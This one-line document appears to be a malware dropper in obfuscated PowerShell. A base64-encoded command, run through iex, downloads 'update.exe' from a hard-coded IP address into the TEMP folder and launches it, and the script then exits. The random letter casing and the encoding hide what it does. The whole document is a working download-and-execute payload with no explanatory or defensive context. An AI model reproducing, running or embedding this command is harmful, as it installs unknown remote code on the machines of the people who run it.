iex([SYSTEM.Text.enCOdinG]::uTf8.GEtSTriNg([SYSteM.COnVert]::frombase64StriNG('CihOZXctT2JqZWN0IHNZU1RlTS5ORVQuV2VCQ0xpRU50KS5kb3dOTE9BRGZJTEUoJ2h0dHA6Ly8xODUuMTQxLjI3LjI4L3VwZGF0ZS5leGUnLCIkRW5WOlRFTVBcZmlsZTJ4ODYuZXhlIik7U3RhcnQtUHJvY2VzcyAoIiRFblY6VEVNUFxmaWxlMng4Ni5leGUiKQoK')));exit
